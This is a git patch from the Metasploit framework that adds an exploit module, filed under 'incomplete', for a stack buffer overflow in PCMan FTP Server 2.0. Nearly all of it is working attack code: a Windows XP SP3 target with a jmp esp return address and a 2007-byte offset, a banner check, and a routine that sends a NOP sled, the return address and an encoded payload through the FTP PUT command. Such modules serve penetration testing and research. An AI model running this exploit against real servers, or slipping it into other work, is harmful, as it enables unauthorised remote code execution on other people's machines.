From ca47bf553cfcccdaa3ee2fce72b4cc01a5fb0efd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 8 Oct 2015 12:07:10 -0500
Subject: [PATCH] Land module as incomplete

---
 .../incomplete/windows/ftp/pcman_put.rb       | 78 +++++++++++++++++++
 1 file changed, 78 insertions(+)
 create mode 100644 unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb

diff --git a/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb b/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
new file mode 100644
index 0000000000..cd65aaf971
--- /dev/null
+++ b/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'			 => 'PCMan FTP Server PUT Command Buffer Overflow',
+      'Description'	 => %q{
+          PCMan FTP Server 2.0 is prone to an overflow condition. It
+        fails to properly sanitize user-supplied input resulting in a
+        stack-based buffer overflow. With a specially crafted 'PUT'
+        command, a remote attacker can potentially have an unspecified
+        impact.
+      },
+      'Platform'		 => 'win',
+      'Author'		 =>
+        [
+          'Jay Turla'
+        ],
+      'License'		 => MSF_LICENSE,
+      'References'	 =>
+        [
+          [ 'EDB', '37731'],
+          [ 'OSVDB', '94624']
+        ],
+      'Privileged'	 => false,
+      'DefaultOptions'   =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'		 =>
+        {
+          'Space'          => 1000,
+          'BadChars'       => "\x00\xff\x0a\x0d\x20\x40"
+        },
+      'Targets'		=>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77c35459, # jmp esp from msvcrt.dll
+              'Offset'   => 2007
+            }
+          ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 27 2013'))
+  end
+
+  def check
+    connect
+    disconnect
+    if (banner =~ /220 PCMan's FTP Server 2\.0/)
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    connect_login
+
+    print_status("Trying target #{target.name}...")
+
+    buf = make_nops(target['Offset']) + [target.ret].pack('V')
+    buf << make_nops(30)
+    buf << payload.encoded
+    send_cmd( ['PUT', buf] , false )
+    disconnect
+  end
+end